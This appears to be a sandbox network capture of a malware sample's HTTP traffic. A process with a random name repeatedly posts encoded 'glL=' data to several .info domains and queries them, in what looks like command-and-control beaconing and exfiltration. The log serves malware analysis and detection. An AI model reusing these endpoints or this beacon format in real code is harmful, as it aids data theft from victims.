                                                            Dec 16, 2024 22:03:01.578192949 CET563OUTGET /2qp1/?glL=iAfo7kyxyM8SbyTkDI5k288SnJKrpySaUlzu2KdJLHgSYyW5/i+VJubeiwpJlBWypThli/YBYynL/4IW8lZMR/MoGyinCvu20CTNw0ikAJ9FU+0P9V3uIW81193Xb1ws6Q==&UBE=olMPpNEHS HTTP/1.1
                                                            Host: www.cloijz.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:03:03.829849958 CET139INHTTP/1.1 567 unknown
                                                            Server: nginx/1.18.0
                                                            Date: Mon, 16 Dec 2024 21:03:03 GMT
                                                            Content-Length: 17
                                                            Connection: close
                                                            Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                            Data Ascii: Request too large


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.54983547.83.1.90802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:09.626432896 CET820OUTPOST /jfb9/ HTTP/1.1
                                                            Host: www.gayhxi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.gayhxi.info
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.gayhxi.info/jfb9/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 71 38 41 4f 63 6c 79 43 6d 62 38 57 30 6d 44 59 36 44 56 52 56 6f 43 57 4f 4e 48 32 45 45 4c 73 59 72 64 4b 54 6d 53 4f 48 76 38 73 53 77 78 6f 4b 6e 59 56 30 70 37 76 6c 53 6f 63 65 6b 37 62 7a 51 30 6f 2b 42 61 48 54 33 6b 6e 57 76 45 33 57 75 6f 38 4c 71 69 50 36 74 62 37 52 51 54 61 42 35 73 79 67 77 63 79 49 78 42 64 35 72 46 2b 6b 4f 53 62 7a 77 71 68 4c 59 65 31 48 73 64 77 32 4e 55 33 56 53 47 74 54 30 4c 47 31 63 48 48 59 32 66 5a 6a 77 48 4d 62 65 33 54 71 49 4c 79 32 33 35 50 59 38 56 44 73 31 45 6f 46 36 46 63 38 34 43 76 4b 6b 72 49 39 46 44 4a 47 57 74 56 75 41 4a 37 51 47 67 3d
                                                            Data Ascii: glL=q8AOclyCmb8W0mDY6DVRVoCWONH2EELsYrdKTmSOHv8sSwxoKnYV0p7vlSocek7bzQ0o+BaHT3knWvE3Wuo8LqiP6tb7RQTaB5sygwcyIxBd5rF+kOSbzwqhLYe1Hsdw2NU3VSGtT0LG1cHHY2fZjwHMbe3TqILy235PY8VDs1EoF6Fc84CvKkrI9FDJGWtVuAJ7QGg=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.54984147.83.1.90802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:12.349762917 CET840OUTPOST /jfb9/ HTTP/1.1
                                                            Host: www.gayhxi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.gayhxi.info
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.gayhxi.info/jfb9/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 71 38 41 4f 63 6c 79 43 6d 62 38 57 6c 33 7a 59 38 6b 42 52 55 49 43 5a 42 74 48 32 4e 6b 4c 6f 59 72 42 4b 54 6e 48 4c 48 64 6f 73 53 53 70 6f 4a 6a 73 56 7a 70 37 76 74 79 6f 56 54 45 37 51 7a 51 6f 67 2b 44 65 48 54 33 77 6e 57 76 30 33 57 39 41 2f 4a 36 69 4e 79 4e 62 35 65 77 54 61 42 35 73 79 67 77 49 63 49 78 35 64 35 62 56 2b 6c 76 53 59 36 51 71 69 49 59 65 31 44 73 64 73 32 4e 55 46 56 54 4b 4c 54 32 7a 47 31 64 33 48 62 6e 66 65 77 51 48 4b 57 2b 32 41 6b 64 37 32 35 32 70 37 63 4d 59 48 73 55 30 79 41 4d 30 32 6d 61 4b 48 5a 45 48 77 74 57 4c 2b 58 6d 4d 38 30 6a 5a 4c 4f 52 30 33 36 59 56 69 63 49 51 76 67 77 50 5a 43 4f 4a 73 6c 6c 6e 39
                                                            Data Ascii: glL=q8AOclyCmb8Wl3zY8kBRUICZBtH2NkLoYrBKTnHLHdosSSpoJjsVzp7vtyoVTE7QzQog+DeHT3wnWv03W9A/J6iNyNb5ewTaB5sygwIcIx5d5bV+lvSY6QqiIYe1Dsds2NUFVTKLT2zG1d3HbnfewQHKW+2Akd7252p7cMYHsU0yAM02maKHZEHwtWL+XmM80jZLOR036YVicIQvgwPZCOJslln9


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.54984747.83.1.90802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:15.015777111 CET1857OUTPOST /jfb9/ HTTP/1.1
                                                            Host: www.gayhxi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.gayhxi.info
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.gayhxi.info/jfb9/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 71 38 41 4f 63 6c 79 43 6d 62 38 57 6c 33 7a 59 38 6b 42 52 55 49 43 5a 42 74 48 32 4e 6b 4c 6f 59 72 42 4b 54 6e 48 4c 48 63 51 73 53 6a 4a 6f 4c 45 77 56 79 70 37 76 6e 53 6f 59 54 45 37 4e 7a 51 77 61 2b 44 43 78 54 30 49 6e 58 4d 38 33 42 63 41 2f 44 36 69 4e 77 4e 62 36 52 51 54 50 42 35 38 32 67 7a 77 63 49 78 35 64 35 64 5a 2b 69 2b 53 59 38 51 71 68 4c 59 66 30 48 73 64 49 32 4e 38 56 56 54 65 45 54 47 54 47 30 39 6e 48 61 56 33 65 71 51 48 49 56 2b 33 48 6b 64 2b 6f 35 32 30 45 63 4d 73 39 73 54 41 79 43 71 35 63 30 4a 75 6a 46 30 44 6a 6d 55 66 36 42 79 51 6e 38 6c 5a 72 54 42 51 79 6d 62 73 50 57 38 77 63 72 6a 71 4f 63 66 64 71 75 7a 53 6a 53 62 33 6d 52 39 49 6e 31 4b 2b 44 65 35 51 55 36 6a 5a 62 31 79 43 73 6b 67 46 41 7a 6c 71 6d 65 78 6f 32 67 63 41 6d 47 70 67 67 48 70 39 79 6a 48 4e 6d 6d 63 52 46 43 34 53 38 52 39 6f 67 56 78 31 4a 6a 57 6d 57 53 52 2f 6a 48 59 72 5a 64 2f 79 35 70 58 59 6b 48 6b 34 70 55 49 2f 4e 6c 4e 49 6e 4d 7a 78 30 6c 69 4f 39 39 50 57 6f 62 68 [TRUNCATED]
                                                            Data Ascii: glL=q8AOclyCmb8Wl3zY8kBRUICZBtH2NkLoYrBKTnHLHcQsSjJoLEwVyp7vnSoYTE7NzQwa+DCxT0InXM83BcA/D6iNwNb6RQTPB582gzwcIx5d5dZ+i+SY8QqhLYf0HsdI2N8VVTeETGTG09nHaV3eqQHIV+3Hkd+o520EcMs9sTAyCq5c0JujF0DjmUf6ByQn8lZrTBQymbsPW8wcrjqOcfdquzSjSb3mR9In1K+De5QU6jZb1yCskgFAzlqmexo2gcAmGpggHp9yjHNmmcRFC4S8R9ogVx1JjWmWSR/jHYrZd/y5pXYkHk4pUI/NlNInMzx0liO99PWobhezOr3QBJ2mWtBK0zXkJ/yQiSPfmWPiKUdbzWtpNa0aVZFnOuilrqOmh8GQS+dypB61fepTv+LbqmNsslfm6QHmyu/7qiszWKuE8k7NLnl4cheeQrL4Wzg5+QWkb5nVKqK4U4SWXTYr11gCYfC5rV2BO2NSRJJ2bisGd09gEaLJenQQJZSwbFV6KoN7k+opApZb+BgVvi4Xyymtzg7qIPsluNDUUCNKScYzJuTDIwpRfPMzlgiIC6fUGm4HLkkpczSJGozs/ymk8K7mPbdI5x7RDzwmo+a2oGFp5YR/BahlJ5D61ym/CXbIVww3Ubd02pHN16jZDBhPW/ArSiFFyjBPnRLvkVv0Q3jysDOz0Mt9gDUA8s/fopCkAPSWDs0g0IAxkodC26mDC5XGb9oqEGHg2aPHf/arbEL50FQAWeH1hrrd1JddZ4JMBJLssKbykV9ESJRN+iwwyqgZ94VSe57jl/e5RxULf1P+zH0NBNHu2CesNgxqXCZY92vif4rGXBcH3Oi/2jVA+JMNRwKG4PMADXcRinGY+GDmKfsGqs7JxKtkzFPiaI7G7aKhpZRJMQR70JSqI1V48hYu5M2jUe71dFvUwy8K8F+IqYs4g6MecfYwz+PcM/ryD7Kq/N9qxKeaUZZN2VmKOQ5MuRt9pFbk5+/GyZB4Tmy+ [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.54985747.83.1.90802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:17.680674076 CET563OUTGET /jfb9/?UBE=olMPpNEHS&glL=n+oufRGikYAAs0HL5l5OS9+VIte6FD/PUe1ObhKPGO46Uzt6PHcP6K7liCFsUkPKwyN7qiCJdHMCS8kfAvInPaDq96CZaATaILcBmE0TRRNwo+1Tq8y6+R2DGpr7DsE+qQ== HTTP/1.1
                                                            Host: www.gayhxi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:03:19.923130989 CET139INHTTP/1.1 567 unknown
                                                            Server: nginx/1.18.0
                                                            Date: Mon, 16 Dec 2024 21:03:19 GMT
                                                            Content-Length: 17
                                                            Connection: close
                                                            Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                            Data Ascii: Request too large


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.54987484.32.84.32802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:25.949803114 CET826OUTPOST /iiuy/ HTTP/1.1
                                                            Host: www.promocao.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.promocao.info
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.promocao.info/iiuy/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 73 37 4a 2f 62 69 51 76 31 4a 5a 64 79 50 75 74 56 4e 78 6a 7a 64 33 4e 4d 75 67 5a 6e 30 2b 79 6c 79 4d 32 52 6b 4e 79 31 33 5a 30 74 59 6c 73 58 64 34 55 62 64 73 62 43 75 6e 41 45 75 33 49 4e 4d 4a 53 35 33 42 4e 2b 78 30 43 69 7a 49 69 53 52 62 79 55 4c 66 30 46 52 72 5a 76 34 56 6c 58 4c 69 6a 61 2b 42 56 5a 6a 44 66 71 33 4c 45 2b 2f 4e 46 44 6e 50 55 2b 53 73 4e 76 63 32 61 6d 73 36 54 6a 4d 35 59 78 43 4f 76 59 49 72 43 7a 39 34 5a 4d 6b 4e 51 32 72 76 64 5a 41 6a 69 4c 31 6c 56 4d 5a 63 46 36 59 75 5a 69 4e 57 34 66 36 61 49 6d 4d 75 38 59 52 66 36 4f 6f 48 67 36 7a 78 70 57 6f 6b 3d
                                                            Data Ascii: glL=s7J/biQv1JZdyPutVNxjzd3NMugZn0+ylyM2RkNy13Z0tYlsXd4UbdsbCunAEu3INMJS53BN+x0CizIiSRbyULf0FRrZv4VlXLija+BVZjDfq3LE+/NFDnPU+SsNvc2ams6TjM5YxCOvYIrCz94ZMkNQ2rvdZAjiL1lVMZcF6YuZiNW4f6aImMu8YRf6OoHg6zxpWok=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.54988484.32.84.32802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:28.624213934 CET846OUTPOST /iiuy/ HTTP/1.1
                                                            Host: www.promocao.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.promocao.info
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.promocao.info/iiuy/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 73 37 4a 2f 62 69 51 76 31 4a 5a 64 67 2f 65 74 58 73 78 6a 6e 4e 33 4b 49 65 67 5a 79 6b 2b 49 6c 79 49 32 52 6c 34 33 32 42 68 30 75 35 31 73 46 4d 34 55 59 64 73 62 4a 4f 6d 49 4c 4f 33 50 4e 4d 45 76 35 32 39 4e 2b 78 49 43 69 7a 59 69 53 6d 75 41 47 72 66 68 63 42 72 68 77 6f 56 6c 58 4c 69 6a 61 36 70 2f 5a 6a 62 66 71 48 37 45 38 65 4e 43 46 58 50 58 32 79 73 4e 34 4d 32 65 6d 73 37 32 6a 4e 30 46 78 42 32 76 59 4e 58 43 39 4d 34 59 43 55 4e 53 79 72 75 4d 57 69 53 72 4b 31 70 2b 47 36 68 62 6d 70 43 2f 6e 37 6e 53 46 59 53 67 31 73 43 45 49 43 58 4e 66 59 6d 4a 67 51 68 5a 49 2f 77 74 52 63 4d 42 66 65 73 37 32 66 6d 57 48 59 74 64 70 62 56 48
                                                            Data Ascii: glL=s7J/biQv1JZdg/etXsxjnN3KIegZyk+IlyI2Rl432Bh0u51sFM4UYdsbJOmILO3PNMEv529N+xICizYiSmuAGrfhcBrhwoVlXLija6p/ZjbfqH7E8eNCFXPX2ysN4M2ems72jN0FxB2vYNXC9M4YCUNSyruMWiSrK1p+G6hbmpC/n7nSFYSg1sCEICXNfYmJgQhZI/wtRcMBfes72fmWHYtdpbVH


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.54989184.32.84.32802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:31.384668112 CET1863OUTPOST /iiuy/ HTTP/1.1
                                                            Host: www.promocao.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.promocao.info
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.promocao.info/iiuy/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 73 37 4a 2f 62 69 51 76 31 4a 5a 64 67 2f 65 74 58 73 78 6a 6e 4e 33 4b 49 65 67 5a 79 6b 2b 49 6c 79 49 32 52 6c 34 33 32 43 42 30 75 4c 74 73 58 2f 51 55 5a 64 73 62 58 2b 6d 4c 4c 4f 33 65 4e 4d 64 6f 35 32 77 77 2b 33 45 43 6a 51 41 69 61 30 47 41 66 62 66 68 42 52 72 61 76 34 55 6e 58 4c 79 6e 61 2b 31 2f 5a 6a 62 66 71 46 6a 45 34 50 4e 43 48 58 50 55 2b 53 73 42 76 63 33 42 6d 73 79 4c 6a 4e 78 79 77 78 57 76 59 74 6e 43 2f 36 6b 59 41 30 4e 63 2f 4c 75 55 57 69 65 6f 4b 31 31 59 47 37 46 39 6d 71 69 2f 6b 74 76 49 53 38 65 52 33 4b 4b 67 50 31 72 32 66 50 43 61 67 57 64 79 4d 64 30 4b 5a 4f 6b 35 52 5a 38 4c 31 4f 76 37 62 75 68 70 6a 2b 34 61 71 43 50 66 33 78 41 56 63 44 37 67 4d 67 54 42 73 76 66 77 51 42 52 4d 4e 4a 6a 68 6f 78 33 47 46 46 79 73 42 73 58 56 32 78 32 37 7a 43 65 4e 4a 64 71 4a 44 73 68 6a 75 43 43 77 51 67 4c 71 4b 54 68 53 44 73 50 50 31 4a 58 59 33 73 76 65 59 4e 64 31 42 4f 2b 75 4c 49 35 2f 45 52 52 76 44 47 78 65 43 68 42 63 30 2b 7a 30 76 7a 57 4e 35 65 [TRUNCATED]
                                                            Data Ascii: glL=s7J/biQv1JZdg/etXsxjnN3KIegZyk+IlyI2Rl432CB0uLtsX/QUZdsbX+mLLO3eNMdo52ww+3ECjQAia0GAfbfhBRrav4UnXLyna+1/ZjbfqFjE4PNCHXPU+SsBvc3BmsyLjNxywxWvYtnC/6kYA0Nc/LuUWieoK11YG7F9mqi/ktvIS8eR3KKgP1r2fPCagWdyMd0KZOk5RZ8L1Ov7buhpj+4aqCPf3xAVcD7gMgTBsvfwQBRMNJjhox3GFFysBsXV2x27zCeNJdqJDshjuCCwQgLqKThSDsPP1JXY3sveYNd1BO+uLI5/ERRvDGxeChBc0+z0vzWN5eTRDL98AVo1mdsgmCi257a0Yr6nx1eGS45vs0ISsGcPtY5Cc6Fh55zPl+w742z80uFaO+ua0fg2q5LzjjlFGSEtbd1LPVWB71xJf1/B0c2H+MvH/LlkAfjplg9LfsQq3G4Rf6S7pJHBTIdGg87ybG4DMe0iGBHDIoG+gGbNboQZLFApNn8lfvVQb1Eutz/D6zEJFS9OpXPpgh+zOWCKlLgx4U8otaed9DqE6uh9VDnbbpDAnBqEe63YMSVRWhsXu4aPznzc2hi4p8JDEwnVXSneI6GOYZbNrNQX0I4X0FPR5iAaU757GBdOgiRmQiXyWT78W4abic87ODfpcwrVzGymDtgnsW3EMOe2x/K/QdyiXDe/gw6wen84eVLnhZxG0aeVMe/rws6IENLBvzOZXV31TXCe4wMOjIxhF/eoYzD8nJ/ZB+ZdqfINM1i+NQ1mOS1AlGXnHMwjhVcbRrYeLa90gjIzsQzMD07EzJrkbTH34stgL8hIn4vMKuS9FS3WgpEto4CUEm4K9tbt6rv6wQ0VGMwi2hP7MJCZRYdnnTFDzApj7Ta9pj5Ag7rZhJTdO4ZFp+RCBhjoMgboxe5c/wwiakKNNiOwRNXXgu28A7mE8VsJJlOY9BlnpENkklfReBIj7OBKn6aZkfLG/ccqamYi2b1SO3qBPcYV [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.54989784.32.84.32802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:03:34.052823067 CET565OUTGET /iiuy/?glL=h5hfYSwK15xKquamFutJkZvqM9csqGuuwC4tQTE20yZspqFHLNM/fO5mCZyIAMXPSsknukIC0GoengQLRlCOYavrEGfuz6Bpd5KKMLFzOmqT4l3909FqMEv20jVy1tDFzg==&UBE=olMPpNEHS HTTP/1.1
                                                            Host: www.promocao.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:03:35.140481949 CET1236INHTTP/1.1 200 OK
                                                            Date: Mon, 16 Dec 2024 21:03:34 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 9973
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Server: hcdn
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 6808a909c6a33fa40daca179e397fc0d-bos-edge4
                                                            Expires: Mon, 16 Dec 2024 21:03:33 GMT
                                                            Cache-Control: no-cache
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                            Dec 16, 2024 22:03:35.140569925 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                            Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                            Dec 16, 2024 22:03:35.140587091 CET448INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                            Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                            Dec 16, 2024 22:03:35.140798092 CET1236INData Raw: 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e
                                                            Data Ascii: ;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.section-title{color:#2f1c6a;fo
                                                            Dec 16, 2024 22:03:35.140846014 CET1236INData Raw: 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73
                                                            Data Ascii: }.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><scrip
                                                            Dec 16, 2024 22:03:35.140861988 CET1236INData Raw: 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 75 73 65 72 73 22 3e 3c 2f 69 3e 20 41 66 66 69 6c 69 61 74 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 68 70 61
